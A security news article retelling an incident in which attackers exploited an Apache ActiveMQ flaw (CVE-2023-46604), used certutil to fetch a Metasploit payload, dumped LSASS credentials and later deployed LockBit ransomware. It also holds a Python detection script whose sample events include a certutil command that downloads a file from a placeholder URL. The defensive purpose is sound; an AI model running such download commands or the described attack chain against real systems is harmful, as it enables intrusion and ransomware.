Malicious actors exploit an Apache ActiveMQ server vulnerability

Malicious actors exploited an Apache ActiveMQ server vulnerability to gain Remote Desktop Protocol access and deploy the LockBit ransomware.
Attackers exploited a known security flaw in Apache ActiveMQ, leading to widespread execution of the LockBit ransomware on corporate networks.

By exploiting CVE-2023-46604, a vulnerability in ActiveMQ's messaging service, the attackers gained unauthorized access to an exposed Windows host and reached it over Remote Desktop. They retained remote command execution for about nineteen days before fully compromising the targeted systems by this route.

In February 2024, an attacker sent a crafted protocol message to a publicly exposed Apache ActiveMQ instance.

The message caused the server to load an external Spring XML configuration, which in turn executed a Metasploit payload fetched with Microsoft's certutil tool on the Windows host.

Once running, the payload connected back to an attacker-controlled command-and-control server at 166[.]62[.]100[.]52.

Roughly forty minutes after gaining this foothold, the attacker escalated to SYSTEM privileges by accessing the memory of the LSASS process on the beachhead host.

The DFIR Report's researchers found that the intruders left the environment two days into the intrusion; because the unpatched Apache ActiveMQ instance remained exposed, they later returned through the same attack vector.

Eighteen days after the initial intrusion, the attackers reappeared using the same exploit, changing only the file names used in their attack chain.

Using the credentials of a service account stolen during the first intrusion, they then logged in directly through that compromised account.

Initial Access (Source - The DFIR Report)
On their return, the attackers had already obtained administrative rights over the infrastructure. They then ran a renamed copy of the "Advanced IP Scanner" tool, disguised to look like "SoftPerfect Network Scanner", to identify live hosts across the environment.
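Two steps of the chain above leave simple host-telemetry traces: the ActiveMQ Java process spawning certutil to fetch a file, and a tool whose on-disk name no longer matches its compiled-in original name. The following is an added example, not code from the article or from The DFIR Report; it assumes Sysmon-style process-creation records with an OriginalFileName field, that the ActiveMQ broker runs as java.exe, and a constructed watchlist of tool names (the sample events, hosts, paths and URL are all constructed placeholders).

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """One process-creation record (Sysmon event 1 style, constructed)."""
    host: str
    parent_image: str
    image: str
    cmdline: str
    original_filename: str  # PE version-info OriginalFileName

# Constructed sample events; hosts, paths and the URL are placeholders.
SAMPLE_EVENTS = [
    ProcEvent("mq01", r"C:\activemq\bin\wrapper.exe", r"C:\Java\bin\java.exe",
              "java.exe -jar activemq.jar", "java.exe"),
    ProcEvent("mq01", r"C:\Java\bin\java.exe", r"C:\Windows\System32\certutil.exe",
              "certutil -urlcache -split -f http://example.invalid/stage.exe "
              r"C:\Users\Public\stage.exe", "CertUtil.exe"),
    ProcEvent("ws12", r"C:\Windows\explorer.exe", r"C:\Users\Public\netscan.exe",
              "netscan.exe", "advanced_ip_scanner.exe"),
    ProcEvent("ws12", r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              "notepad.exe", "NOTEPAD.EXE"),
]

# certutil invoked with -urlcache and a remote URL: a file download, not certificate work.
CERTUTIL_FETCH = re.compile(r"certutil(\.exe)?\s.*-urlcache\b.*https?://", re.I)
# Assumed watchlist of tool names (matched against OriginalFileName) whose renaming is suspicious.
RENAME_WATCHLIST = ("advanced_ip_scanner",)

def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]

def detect(events):
    """Return (host, rule, detail) tuples for events matching either rule."""
    hits = []
    for e in events:
        img, parent, orig = basename(e.image), basename(e.parent_image), e.original_filename.lower()
        # Rule 1: the broker's Java process launching certutil to fetch a remote file,
        # the payload-delivery step described in the article (assumes ActiveMQ runs as java.exe).
        if img == "certutil.exe" and parent == "java.exe" and CERTUTIL_FETCH.search(e.cmdline):
            hits.append((e.host, "java_spawned_certutil_download", e.cmdline))
        # Rule 2: on-disk name differs from the compiled-in OriginalFileName of a watched tool,
        # as with the Advanced IP Scanner copy disguised as another scanner.
        if orig != img and any(w in orig for w in RENAME_WATCHLIST):
            hits.append((e.host, "renamed_watched_tool", f"{img} -> {orig}"))
    return hits
```

Running `detect(SAMPLE_EVENTS)` flags the certutil download on mq01 and the renamed scanner on ws12 while leaving the broker start and notepad untouched.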

They then copied LockBit ransomware binaries to servers and workstations over Remote Desktop Protocol connections, using two distinct files, LB3.exe and LB3_pass.

On servers, the ransomware was launched with specific command-line arguments such as a target path and a password; elsewhere it was run more simply by double-clicking it in Windows File Explorer.

The ransom notes directed victims to the Session instant-messaging platform rather than to LockBit's own infrastructure, suggesting the attacker was an independent operator who built the malware from the stolen LockBit code.

The total time to ransomware was approximately 419 hours, nearly eighteen days from initial access until data encryption. The initial intrusion went undetected, and the attackers reached elevated access within less than an hour of entering the system.

CVE ID           CVSS Score   Description
CVE-2023-46604   10           Apache ActiveMQ remote code execution via a crafted OpenWire ClassInfo command
Credential Theft Driving Lateral Movement
After reaching SYSTEM on the initial foothold, the attacker used Metasploit to access the LSASS process on several hosts at once during the first intrusion.
